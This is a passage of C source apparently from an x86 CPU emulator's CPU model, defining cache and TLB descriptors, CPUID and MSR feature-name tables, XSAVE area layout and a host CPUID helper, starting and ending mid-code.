legacy_l1d_cache_amd = { .type = DATA_CACHE, .level = 1, .size = 64 * KiB, .self_init = 1, .line_size = 64, .associativity = 2, .sets = 512, .partitions = 1, .lines_per_tag = 1, .no_invd_sharing = true, }; /* L1 instruction cache: */ static CPUCacheInfo legacy_l1i_cache = { .type = INSTRUCTION_CACHE, .level = 1, .size = 32 * KiB, .self_init = 1, .line_size = 64, .associativity = 8, .sets = 64, .partitions = 1, .no_invd_sharing = true, }; /*FIXME: CPUID leaf 0x80000005 is inconsistent with leaves 2 & 4 */ static CPUCacheInfo legacy_l1i_cache_amd = { .type = INSTRUCTION_CACHE, .level = 1, .size = 64 * KiB, .self_init = 1, .line_size = 64, .associativity = 2, .sets = 512, .partitions = 1, .lines_per_tag = 1, .no_invd_sharing = true, }; /* Level 2 unified cache: */ static CPUCacheInfo legacy_l2_cache = { .type = UNIFIED_CACHE, .level = 2, .size = 4 * MiB, .self_init = 1, .line_size = 64, .associativity = 16, .sets = 4096, .partitions = 1, .no_invd_sharing = true, }; /*FIXME: CPUID leaf 2 descriptor is inconsistent with CPUID leaf 4 */ static CPUCacheInfo legacy_l2_cache_cpuid2 = { .type = UNIFIED_CACHE, .level = 2, .size = 2 * MiB, .line_size = 64, .associativity = 8, }; /*FIXME: CPUID leaf 0x80000006 is inconsistent with leaves 2 & 4 */ static CPUCacheInfo legacy_l2_cache_amd = { .type = UNIFIED_CACHE, .level = 2, .size = 512 * KiB, .line_size = 64, .lines_per_tag = 1, .associativity = 16, .sets = 512, .partitions = 1, }; /* Level 3 unified cache: */ static CPUCacheInfo legacy_l3_cache = { .type = UNIFIED_CACHE, .level = 3, .size = 16 * MiB, .line_size = 64, .associativity = 16, .sets = 16384, .partitions = 1, .lines_per_tag = 1, .self_init = true, .inclusive = true, .complex_indexing = true, }; /* TLB definitions: */ #define L1_DTLB_2M_ASSOC 1 #define L1_DTLB_2M_ENTRIES 255 #define L1_DTLB_4K_ASSOC 1 #define L1_DTLB_4K_ENTRIES 255 #define L1_ITLB_2M_ASSOC 1 #define L1_ITLB_2M_ENTRIES 255 #define L1_ITLB_4K_ASSOC 1 #define L1_ITLB_4K_ENTRIES 255 #define L2_DTLB_2M_ASSOC 0 /* disabled */ #define L2_DTLB_2M_ENTRIES 0 /* disabled */ #define L2_DTLB_4K_ASSOC 4 #define L2_DTLB_4K_ENTRIES 512 #define L2_ITLB_2M_ASSOC 0 /* disabled */ #define L2_ITLB_2M_ENTRIES 0 /* disabled */ #define L2_ITLB_4K_ASSOC 4 #define L2_ITLB_4K_ENTRIES 512 /* CPUID Leaf 0x14 constants: */ #define INTEL_PT_MAX_SUBLEAF 0x1 /* * bit[00]: IA32_RTIT_CTL.CR3 filter can be set to 1 and IA32_RTIT_CR3_MATCH * MSR can be accessed; * bit[01]: Support Configurable PSB and Cycle-Accurate Mode; * bit[02]: Support IP Filtering, TraceStop filtering, and preservation * of Intel PT MSRs across warm reset; * bit[03]: Support MTC timing packet and suppression of COFI-based packets; */ #define INTEL_PT_MINIMAL_EBX 0xf /* * bit[00]: Tracing can be enabled with IA32_RTIT_CTL.ToPA = 1 and * IA32_RTIT_OUTPUT_BASE and IA32_RTIT_OUTPUT_MASK_PTRS MSRs can be * accessed; * bit[01]: ToPA tables can hold any number of output entries, up to the * maximum allowed by the MaskOrTableOffset field of * IA32_RTIT_OUTPUT_MASK_PTRS; * bit[02]: Support Single-Range Output scheme; */ #define INTEL_PT_MINIMAL_ECX 0x7 /* generated packets which contain IP payloads have LIP values */ #define INTEL_PT_IP_LIP (1 << 31) #define INTEL_PT_ADDR_RANGES_NUM 0x2 /* Number of configurable address ranges */ #define INTEL_PT_ADDR_RANGES_NUM_MASK 0x3 #define INTEL_PT_MTC_BITMAP (0x0249 << 16) /* Support ART(0,3,6,9) */ #define INTEL_PT_CYCLE_BITMAP 0x1fff /* Support 0,2^(0~11) */ #define INTEL_PT_PSB_BITMAP (0x003f << 16) /* Support 2K,4K,8K,16K,32K,64K */ #define I486_FEATURES (CPUID_FP87 | CPUID_VME | CPUID_PSE) #define PENTIUM_FEATURES (I486_FEATURES | CPUID_DE | CPUID_TSC | \ CPUID_MSR | CPUID_MCE | CPUID_CX8 | CPUID_MMX | CPUID_APIC) #define PENTIUM2_FEATURES (PENTIUM_FEATURES | CPUID_PAE | CPUID_SEP | \ CPUID_MTRR | CPUID_PGE | CPUID_MCA | CPUID_CMOV | CPUID_PAT | \ CPUID_PSE36 | CPUID_FXSR) #define PENTIUM3_FEATURES (PENTIUM2_FEATURES | CPUID_SSE) #define PPRO_FEATURES (CPUID_FP87 | CPUID_DE | CPUID_PSE | CPUID_TSC | \ CPUID_MSR | CPUID_MCE | CPUID_CX8 | CPUID_PGE | CPUID_CMOV | \ CPUID_PAT | CPUID_FXSR | CPUID_MMX | CPUID_SSE | CPUID_SSE2 | \ CPUID_PAE | CPUID_SEP | CPUID_APIC) #define TCG_FEATURES (CPUID_FP87 | CPUID_PSE | CPUID_TSC | CPUID_MSR | \ CPUID_PAE | CPUID_MCE | CPUID_CX8 | CPUID_APIC | CPUID_SEP | \ CPUID_MTRR | CPUID_PGE | CPUID_MCA | CPUID_CMOV | CPUID_PAT | \ CPUID_PSE36 | CPUID_CLFLUSH | CPUID_ACPI | CPUID_MMX | \ CPUID_FXSR | CPUID_SSE | CPUID_SSE2 | CPUID_SS | CPUID_DE) /* partly implemented: CPUID_MTRR, CPUID_MCA, CPUID_CLFLUSH (needed for Win64) */ /* missing: CPUID_VME, CPUID_DTS, CPUID_SS, CPUID_HT, CPUID_TM, CPUID_PBE */ #define TCG_EXT_FEATURES (CPUID_EXT_SSE3 | CPUID_EXT_PCLMULQDQ | \ CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | CPUID_EXT_CX16 | \ CPUID_EXT_SSE41 | CPUID_EXT_SSE42 | CPUID_EXT_POPCNT | \ CPUID_EXT_XSAVE | /* CPUID_EXT_OSXSAVE is dynamic */ \ CPUID_EXT_MOVBE | CPUID_EXT_AES | CPUID_EXT_HYPERVISOR | \ CPUID_EXT_RDRAND) /* missing: CPUID_EXT_DTES64, CPUID_EXT_DSCPL, CPUID_EXT_VMX, CPUID_EXT_SMX, CPUID_EXT_EST, CPUID_EXT_TM2, CPUID_EXT_CID, CPUID_EXT_FMA, CPUID_EXT_XTPR, CPUID_EXT_PDCM, CPUID_EXT_PCID, CPUID_EXT_DCA, CPUID_EXT_X2APIC, CPUID_EXT_TSC_DEADLINE_TIMER, CPUID_EXT_AVX, CPUID_EXT_F16C */ #ifdef TARGET_X86_64 #define TCG_EXT2_X86_64_FEATURES (CPUID_EXT2_SYSCALL | CPUID_EXT2_LM) #else #define TCG_EXT2_X86_64_FEATURES 0 #endif #define TCG_EXT2_FEATURES ((TCG_FEATURES & CPUID_EXT2_AMD_ALIASES) | \ CPUID_EXT2_NX | CPUID_EXT2_MMXEXT | CPUID_EXT2_RDTSCP | \ CPUID_EXT2_3DNOW | CPUID_EXT2_3DNOWEXT | CPUID_EXT2_PDPE1GB | \ TCG_EXT2_X86_64_FEATURES) #define TCG_EXT3_FEATURES (CPUID_EXT3_LAHF_LM | CPUID_EXT3_SVM | \ CPUID_EXT3_CR8LEG | CPUID_EXT3_ABM | CPUID_EXT3_SSE4A) #define TCG_EXT4_FEATURES 0 #define TCG_SVM_FEATURES CPUID_SVM_NPT #define TCG_KVM_FEATURES 0 #define TCG_7_0_EBX_FEATURES (CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_SMAP | \ CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ADX | \ CPUID_7_0_EBX_PCOMMIT | CPUID_7_0_EBX_CLFLUSHOPT | \ CPUID_7_0_EBX_CLWB | CPUID_7_0_EBX_MPX | CPUID_7_0_EBX_FSGSBASE | \ CPUID_7_0_EBX_ERMS) /* missing: CPUID_7_0_EBX_HLE, CPUID_7_0_EBX_AVX2, CPUID_7_0_EBX_INVPCID, CPUID_7_0_EBX_RTM, CPUID_7_0_EBX_RDSEED */ #define TCG_7_0_ECX_FEATURES (CPUID_7_0_ECX_PKU | \ /* CPUID_7_0_ECX_OSPKE is dynamic */ \ CPUID_7_0_ECX_LA57) #define TCG_7_0_EDX_FEATURES 0 #define TCG_7_1_EAX_FEATURES 0 #define TCG_APM_FEATURES 0 #define TCG_6_EAX_FEATURES CPUID_6_EAX_ARAT #define TCG_XSAVE_FEATURES (CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XGETBV1) /* missing: CPUID_XSAVE_XSAVEC, CPUID_XSAVE_XSAVES */ typedef enum FeatureWordType { CPUID_FEATURE_WORD, MSR_FEATURE_WORD, } FeatureWordType; typedef struct FeatureWordInfo { FeatureWordType type; /* feature flags names are taken from "Intel Processor Identification and * the CPUID Instruction" and AMD's "CPUID Specification". * In cases of disagreement between feature naming conventions, * aliases may be added. */ const char *feat_names[64]; union { /* If type==CPUID_FEATURE_WORD */ struct { uint32_t eax; /* Input EAX for CPUID */ bool needs_ecx; /* CPUID instruction uses ECX as input */ uint32_t ecx; /* Input ECX value for CPUID */ int reg; /* output register (R_* constant) */ } cpuid; /* If type==MSR_FEATURE_WORD */ struct { uint32_t index; } msr; }; uint64_t tcg_features; /* Feature flags supported by TCG */ /* Features that shouldn't be auto-enabled by "-cpu host" */ uint64_t no_autoenable_flags; } FeatureWordInfo; static FeatureWordInfo feature_word_info[FEATURE_WORDS] = { [FEAT_1_EDX] = { .type = CPUID_FEATURE_WORD, .feat_names = { "fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8", "apic", NULL, "sep", "mtrr", "pge", "mca", "cmov", "pat", "pse36", "pn" /* Intel psn */, "clflush" /* Intel clfsh */, NULL, "ds" /* Intel dts */, "acpi", "mmx", "fxsr", "sse", "sse2", "ss", "ht" /* Intel htt */, "tm", "ia64", "pbe", }, .cpuid = {.eax = 1, .reg = R_EDX, }, .tcg_features = TCG_FEATURES, }, [FEAT_1_ECX] = { .type = CPUID_FEATURE_WORD, .feat_names = { "pni" /* Intel,AMD sse3 */, "pclmulqdq", "dtes64", "monitor", "ds-cpl", "vmx", "smx", "est", "tm2", "ssse3", "cid", NULL, "fma", "cx16", "xtpr", "pdcm", NULL, "pcid", "dca", "sse4.1", "sse4.2", "x2apic", "movbe", "popcnt", "tsc-deadline", "aes", "xsave", NULL /* osxsave */, "avx", "f16c", "rdrand", "hypervisor", }, .cpuid = { .eax = 1, .reg = R_ECX, }, .tcg_features = TCG_EXT_FEATURES, }, /* Feature names that are already defined on feature_name[] but * are set on CPUID[8000_0001].EDX on AMD CPUs don't have their * names on feat_names below. They are copied automatically * to features[FEAT_8000_0001_EDX] if and only if CPU vendor is AMD. */ [FEAT_8000_0001_EDX] = { .type = CPUID_FEATURE_WORD, .feat_names = { NULL /* fpu */, NULL /* vme */, NULL /* de */, NULL /* pse */, NULL /* tsc */, NULL /* msr */, NULL /* pae */, NULL /* mce */, NULL /* cx8 */, NULL /* apic */, NULL, "syscall", NULL /* mtrr */, NULL /* pge */, NULL /* mca */, NULL /* cmov */, NULL /* pat */, NULL /* pse36 */, NULL, NULL /* Linux mp */, "nx", NULL, "mmxext", NULL /* mmx */, NULL /* fxsr */, "fxsr-opt", "pdpe1gb", "rdtscp", NULL, "lm", "3dnowext", "3dnow", }, .cpuid = { .eax = 0x80000001, .reg = R_EDX, }, .tcg_features = TCG_EXT2_FEATURES, }, [FEAT_8000_0001_ECX] = { .type = CPUID_FEATURE_WORD, .feat_names = { "lahf-lm", "cmp-legacy", "svm", "extapic", "cr8legacy", "abm", "sse4a", "misalignsse", "3dnowprefetch", "osvw", "ibs", "xop", "skinit", "wdt", NULL, "lwp", "fma4", "tce", NULL, "nodeid-msr", NULL, "tbm", "topoext", "perfctr-core", "perfctr-nb", NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 0x80000001, .reg = R_ECX, }, .tcg_features = TCG_EXT3_FEATURES, /* * TOPOEXT is always allowed but can't be enabled blindly by * "-cpu host", as it requires consistent cache topology info * to be provided so it doesn't confuse guests. */ .no_autoenable_flags = CPUID_EXT3_TOPOEXT, }, [FEAT_C000_0001_EDX] = { .type = CPUID_FEATURE_WORD, .feat_names = { NULL, NULL, "xstore", "xstore-en", NULL, NULL, "xcrypt", "xcrypt-en", "ace2", "ace2-en", "phe", "phe-en", "pmm", "pmm-en", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 0xC0000001, .reg = R_EDX, }, .tcg_features = TCG_EXT4_FEATURES, }, [FEAT_HV_RECOMM_EAX] = { .type = CPUID_FEATURE_WORD, .feat_names = { NULL /* hv_recommend_pv_as_switch */, NULL /* hv_recommend_pv_tlbflush_local */, NULL /* hv_recommend_pv_tlbflush_remote */, NULL /* hv_recommend_msr_apic_access */, NULL /* hv_recommend_msr_reset */, NULL /* hv_recommend_relaxed_timing */, NULL /* hv_recommend_dma_remapping */, NULL /* hv_recommend_int_remapping */, NULL /* hv_recommend_x2apic_msrs */, NULL /* hv_recommend_autoeoi_deprecation */, NULL /* hv_recommend_pv_ipi */, NULL /* hv_recommend_ex_hypercalls */, NULL /* hv_hypervisor_is_nested */, NULL /* hv_recommend_int_mbec */, NULL /* hv_recommend_evmcs */, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 0x40000004, .reg = R_EAX, }, }, [FEAT_HV_NESTED_EAX] = { .type = CPUID_FEATURE_WORD, .cpuid = { .eax = 0x4000000A, .reg = R_EAX, }, }, [FEAT_SVM] = { .type = CPUID_FEATURE_WORD, .feat_names = { "npt", "lbrv", "svm-lock", "nrip-save", "tsc-scale", "vmcb-clean", "flushbyasid", "decodeassists", NULL, NULL, "pause-filter", NULL, "pfthreshold", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 0x8000000A, .reg = R_EDX, }, .tcg_features = TCG_SVM_FEATURES, }, [FEAT_7_0_EBX] = { .type = CPUID_FEATURE_WORD, .feat_names = { "fsgsbase", "tsc-adjust", NULL, "bmi1", "hle", "avx2", NULL, "smep", "bmi2", "erms", "invpcid", "rtm", NULL, NULL, "mpx", NULL, "avx512f", "avx512dq", "rdseed", "adx", "smap", "avx512ifma", "pcommit", "clflushopt", "clwb", "intel-pt", "avx512pf", "avx512er", "avx512cd", "sha-ni", "avx512bw", "avx512vl", }, .cpuid = { .eax = 7, .needs_ecx = true, .ecx = 0, .reg = R_EBX, }, .tcg_features = TCG_7_0_EBX_FEATURES, }, [FEAT_7_0_ECX] = { .type = CPUID_FEATURE_WORD, .feat_names = { NULL, "avx512vbmi", "umip", "pku", NULL /* ospke */, "waitpkg", "avx512vbmi2", NULL, "gfni", "vaes", "vpclmulqdq", "avx512vnni", "avx512bitalg", NULL, "avx512-vpopcntdq", NULL, "la57", NULL, NULL, NULL, NULL, NULL, "rdpid", NULL, NULL, "cldemote", NULL, "movdiri", "movdir64b", NULL, NULL, NULL, }, .cpuid = { .eax = 7, .needs_ecx = true, .ecx = 0, .reg = R_ECX, }, .tcg_features = TCG_7_0_ECX_FEATURES, }, [FEAT_7_0_EDX] = { .type = CPUID_FEATURE_WORD, .feat_names = { NULL, NULL, "avx512-4vnniw", "avx512-4fmaps", NULL, NULL, NULL, NULL, NULL, NULL, "md-clear", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL /* pconfig */, NULL, NULL, NULL, NULL, NULL, NULL, NULL, "spec-ctrl", "stibp", NULL, "arch-capabilities", "core-capability", "ssbd", }, .cpuid = { .eax = 7, .needs_ecx = true, .ecx = 0, .reg = R_EDX, }, .tcg_features = TCG_7_0_EDX_FEATURES, }, [FEAT_7_1_EAX] = { .type = CPUID_FEATURE_WORD, .feat_names = { NULL, NULL, NULL, NULL, NULL, "avx512-bf16", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 7, .needs_ecx = true, .ecx = 1, .reg = R_EAX, }, .tcg_features = TCG_7_1_EAX_FEATURES, }, [FEAT_8000_0007_EDX] = { .type = CPUID_FEATURE_WORD, .feat_names = { NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, "invtsc", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 0x80000007, .reg = R_EDX, }, .tcg_features = TCG_APM_FEATURES, }, [FEAT_8000_0008_EBX] = { .type = CPUID_FEATURE_WORD, .feat_names = { "clzero", NULL, "xsaveerptr", NULL, NULL, NULL, NULL, NULL, NULL, "wbnoinvd", NULL, NULL, "ibpb", NULL, NULL, "amd-stibp", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, "amd-ssbd", "virt-ssbd", "amd-no-ssb", NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 0x80000008, .reg = R_EBX, }, .tcg_features = 0, }, [FEAT_XSAVE] = { .type = CPUID_FEATURE_WORD, .feat_names = { "xsaveopt", "xsavec", "xgetbv1", "xsaves", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 0xd, .needs_ecx = true, .ecx = 1, .reg = R_EAX, }, .tcg_features = TCG_XSAVE_FEATURES, }, [FEAT_6_EAX] = { .type = CPUID_FEATURE_WORD, .feat_names = { NULL, NULL, "arat", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .cpuid = { .eax = 6, .reg = R_EAX, }, .tcg_features = TCG_6_EAX_FEATURES, }, [FEAT_XSAVE_COMP_LO] = { .type = CPUID_FEATURE_WORD, .cpuid = { .eax = 0xD, .needs_ecx = true, .ecx = 0, .reg = R_EAX, }, .tcg_features = ~0U, }, [FEAT_XSAVE_COMP_HI] = { .type = CPUID_FEATURE_WORD, .cpuid = { .eax = 0xD, .needs_ecx = true, .ecx = 0, .reg = R_EDX, }, .tcg_features = ~0U, }, /*Below are MSR exposed features*/ [FEAT_ARCH_CAPABILITIES] = { .type = MSR_FEATURE_WORD, .feat_names = { "rdctl-no", "ibrs-all", "rsba", "skip-l1dfl-vmentry", "ssb-no", "mds-no", "pschange-mc-no", "tsx-ctrl", "taa-no", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .msr = { .index = MSR_IA32_ARCH_CAPABILITIES, }, }, [FEAT_CORE_CAPABILITY] = { .type = MSR_FEATURE_WORD, .feat_names = { NULL, NULL, NULL, NULL, NULL, "split-lock-detect", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .msr = { .index = MSR_IA32_CORE_CAPABILITY, }, }, [FEAT_VMX_PROCBASED_CTLS] = { .type = MSR_FEATURE_WORD, .feat_names = { NULL, NULL, "vmx-vintr-pending", "vmx-tsc-offset", NULL, NULL, NULL, "vmx-hlt-exit", NULL, "vmx-invlpg-exit", "vmx-mwait-exit", "vmx-rdpmc-exit", "vmx-rdtsc-exit", NULL, NULL, "vmx-cr3-load-noexit", "vmx-cr3-store-noexit", NULL, NULL, "vmx-cr8-load-exit", "vmx-cr8-store-exit", "vmx-flexpriority", "vmx-vnmi-pending", "vmx-movdr-exit", "vmx-io-exit", "vmx-io-bitmap", NULL, "vmx-mtf", "vmx-msr-bitmap", "vmx-monitor-exit", "vmx-pause-exit", "vmx-secondary-ctls", }, .msr = { .index = MSR_IA32_VMX_TRUE_PROCBASED_CTLS, } }, [FEAT_VMX_SECONDARY_CTLS] = { .type = MSR_FEATURE_WORD, .feat_names = { "vmx-apicv-xapic", "vmx-ept", "vmx-desc-exit", "vmx-rdtscp-exit", "vmx-apicv-x2apic", "vmx-vpid", "vmx-wbinvd-exit", "vmx-unrestricted-guest", "vmx-apicv-register", "vmx-apicv-vid", "vmx-ple", "vmx-rdrand-exit", "vmx-invpcid-exit", "vmx-vmfunc", "vmx-shadow-vmcs", "vmx-encls-exit", "vmx-rdseed-exit", "vmx-pml", NULL, NULL, "vmx-xsaves", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .msr = { .index = MSR_IA32_VMX_PROCBASED_CTLS2, } }, [FEAT_VMX_PINBASED_CTLS] = { .type = MSR_FEATURE_WORD, .feat_names = { "vmx-intr-exit", NULL, NULL, "vmx-nmi-exit", NULL, "vmx-vnmi", "vmx-preemption-timer", "vmx-posted-intr", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .msr = { .index = MSR_IA32_VMX_TRUE_PINBASED_CTLS, } }, [FEAT_VMX_EXIT_CTLS] = { .type = MSR_FEATURE_WORD, /* * VMX_VM_EXIT_HOST_ADDR_SPACE_SIZE is copied from * the LM CPUID bit. */ .feat_names = { NULL, NULL, "vmx-exit-nosave-debugctl", NULL, NULL, NULL, NULL, NULL, NULL, NULL /* vmx-exit-host-addr-space-size */, NULL, NULL, "vmx-exit-load-perf-global-ctrl", NULL, NULL, "vmx-exit-ack-intr", NULL, NULL, "vmx-exit-save-pat", "vmx-exit-load-pat", "vmx-exit-save-efer", "vmx-exit-load-efer", "vmx-exit-save-preemption-timer", "vmx-exit-clear-bndcfgs", NULL, "vmx-exit-clear-rtit-ctl", NULL, NULL, NULL, NULL, NULL, NULL, }, .msr = { .index = MSR_IA32_VMX_TRUE_EXIT_CTLS, } }, [FEAT_VMX_ENTRY_CTLS] = { .type = MSR_FEATURE_WORD, .feat_names = { NULL, NULL, "vmx-entry-noload-debugctl", NULL, NULL, NULL, NULL, NULL, NULL, "vmx-entry-ia32e-mode", NULL, NULL, NULL, "vmx-entry-load-perf-global-ctrl", "vmx-entry-load-pat", "vmx-entry-load-efer", "vmx-entry-load-bndcfgs", NULL, "vmx-entry-load-rtit-ctl", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .msr = { .index = MSR_IA32_VMX_TRUE_ENTRY_CTLS, } }, [FEAT_VMX_MISC] = { .type = MSR_FEATURE_WORD, .feat_names = { NULL, NULL, NULL, NULL, NULL, "vmx-store-lma", "vmx-activity-hlt", "vmx-activity-shutdown", "vmx-activity-wait-sipi", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, "vmx-vmwrite-vmexit-fields", "vmx-zero-len-inject", NULL, }, .msr = { .index = MSR_IA32_VMX_MISC, } }, [FEAT_VMX_EPT_VPID_CAPS] = { .type = MSR_FEATURE_WORD, .feat_names = { "vmx-ept-execonly", NULL, NULL, NULL, NULL, NULL, "vmx-page-walk-4", "vmx-page-walk-5", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, "vmx-ept-2mb", "vmx-ept-1gb", NULL, NULL, "vmx-invept", "vmx-eptad", "vmx-ept-advanced-exitinfo", NULL, NULL, "vmx-invept-single-context", "vmx-invept-all-context", NULL, NULL, NULL, NULL, NULL, "vmx-invvpid", NULL, NULL, NULL, NULL, NULL, NULL, NULL, "vmx-invvpid-single-addr", "vmx-invept-single-context", "vmx-invvpid-all-context", "vmx-invept-single-context-noglobals", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .msr = { .index = MSR_IA32_VMX_EPT_VPID_CAP, } }, [FEAT_VMX_BASIC] = { .type = MSR_FEATURE_WORD, .feat_names = { [54] = "vmx-ins-outs", [55] = "vmx-true-ctls", }, .msr = { .index = MSR_IA32_VMX_BASIC, }, /* Just to be safe - we don't support setting the MSEG version field. */ .no_autoenable_flags = MSR_VMX_BASIC_DUAL_MONITOR, }, [FEAT_VMX_VMFUNC] = { .type = MSR_FEATURE_WORD, .feat_names = { [0] = "vmx-eptp-switching", }, .msr = { .index = MSR_IA32_VMX_VMFUNC, } }, }; typedef enum X86CPURegister32 { X86_CPU_REGISTER32_EAX = 0, X86_CPU_REGISTER32_EBX = 1, X86_CPU_REGISTER32_ECX = 2, X86_CPU_REGISTER32_EDX = 3, X86_CPU_REGISTER32_ESP = 4, X86_CPU_REGISTER32_EBP = 5, X86_CPU_REGISTER32_ESI = 6, X86_CPU_REGISTER32_EDI = 7, X86_CPU_REGISTER32_MAX = 8, } X86CPURegister32; typedef struct X86RegisterInfo32 { /* Name of register */ const char *name; /* QAPI enum value register */ X86CPURegister32 qapi_enum; } X86RegisterInfo32; #define REGISTER(reg) \ [R_##reg] = { .name = #reg, .qapi_enum = X86_CPU_REGISTER32_##reg } static const X86RegisterInfo32 x86_reg_info_32[CPU_NB_REGS32] = { REGISTER(EAX), REGISTER(ECX), REGISTER(EDX), REGISTER(EBX), REGISTER(ESP), REGISTER(EBP), REGISTER(ESI), REGISTER(EDI), }; #undef REGISTER typedef struct ExtSaveArea { uint32_t feature, bits; uint32_t offset, size; } ExtSaveArea; static const ExtSaveArea x86_ext_save_areas[] = { [XSTATE_FP_BIT] = { /* x87 FP state component is always enabled if XSAVE is supported */ .feature = FEAT_1_ECX, .bits = CPUID_EXT_XSAVE, /* x87 state is in the legacy region of the XSAVE area */ .offset = 0, .size = sizeof(X86LegacyXSaveArea) + sizeof(X86XSaveHeader), }, [XSTATE_SSE_BIT] = { /* SSE state component is always enabled if XSAVE is supported */ .feature = FEAT_1_ECX, .bits = CPUID_EXT_XSAVE, /* SSE state is in the legacy region of the XSAVE area */ .offset = 0, .size = sizeof(X86LegacyXSaveArea) + sizeof(X86XSaveHeader), }, [XSTATE_YMM_BIT] = { .feature = FEAT_1_ECX, .bits = CPUID_EXT_AVX, .offset = offsetof(X86XSaveArea, avx_state), .size = sizeof(XSaveAVX) }, [XSTATE_BNDREGS_BIT] = { .feature = FEAT_7_0_EBX, .bits = CPUID_7_0_EBX_MPX, .offset = offsetof(X86XSaveArea, bndreg_state), .size = sizeof(XSaveBNDREG) }, [XSTATE_BNDCSR_BIT] = { .feature = FEAT_7_0_EBX, .bits = CPUID_7_0_EBX_MPX, .offset = offsetof(X86XSaveArea, bndcsr_state), .size = sizeof(XSaveBNDCSR) }, [XSTATE_OPMASK_BIT] = { .feature = FEAT_7_0_EBX, .bits = CPUID_7_0_EBX_AVX512F, .offset = offsetof(X86XSaveArea, opmask_state), .size = sizeof(XSaveOpmask) }, [XSTATE_ZMM_Hi256_BIT] = { .feature = FEAT_7_0_EBX, .bits = CPUID_7_0_EBX_AVX512F, .offset = offsetof(X86XSaveArea, zmm_hi256_state), .size = sizeof(XSaveZMM_Hi256) }, [XSTATE_Hi16_ZMM_BIT] = { .feature = FEAT_7_0_EBX, .bits = CPUID_7_0_EBX_AVX512F, .offset = offsetof(X86XSaveArea, hi16_zmm_state), .size = sizeof(XSaveHi16_ZMM) }, [XSTATE_PKRU_BIT] = { .feature = FEAT_7_0_ECX, .bits = CPUID_7_0_ECX_PKU, .offset = offsetof(X86XSaveArea, pkru_state), .size = sizeof(XSavePKRU) }, }; static uint32_t xsave_area_size(uint64_t mask) { int i; uint64_t ret = 0; for (i = 0; i < ARRAY_SIZE(x86_ext_save_areas); i++) { const ExtSaveArea *esa = &x86_ext_save_areas[i]; if ((mask >> i) & 1) { ret = MAX(ret, esa->offset + esa->size); } } return ret; } static inline bool accel_uses_host_cpuid(void) { return false; } static inline uint64_t x86_cpu_xsave_components(X86CPU *cpu) { return ((uint64_t)cpu->env.features[FEAT_XSAVE_COMP_HI]) << 32 | cpu->env.features[FEAT_XSAVE_COMP_LO]; } const char *get_register_name_32(unsigned int reg) { if (reg >= CPU_NB_REGS32) { return NULL; } return x86_reg_info_32[reg].name; } void host_cpuid(uint32_t function, uint32_t count, uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx) { uint32_t vec[4]; #ifdef _MSC_VER __cpuidex((int*)vec, function, count); #else #ifdef __x86_64__ asm volatile("cpuid" : "=a"(vec[0]), "=b"(vec[1]), "=c"(vec[2]), "=d"(vec[3]) : "0"(function), "c"(count) : "cc"); #elif defined(__i386__) asm volatile("pusha \n\t" "cpuid \n\t" "mov %%eax, 0(%2) \n\t" "mov %%ebx, 4(%2) \n\t" "mov %%ecx, 8(%2) \n\t" "mov %%edx, 12(%2) \n\t" "popa" : : "a"(function), "c"(count), "S"(vec) : "memory", "cc"); #else abort(); #endif #endif // _MSC_VER if (eax) *eax = vec[0]; if (ebx) *ebx = vec[1]; if (ecx) *ecx = vec[2]; if (edx) *edx = vec[3]; } void host_vendor_fms(char *vendor, int *family, int *model, int *stepping) { uint32_t eax, ebx, ecx, edx; host_cpuid(0x0, 0, &eax, &ebx, &ecx, &edx); 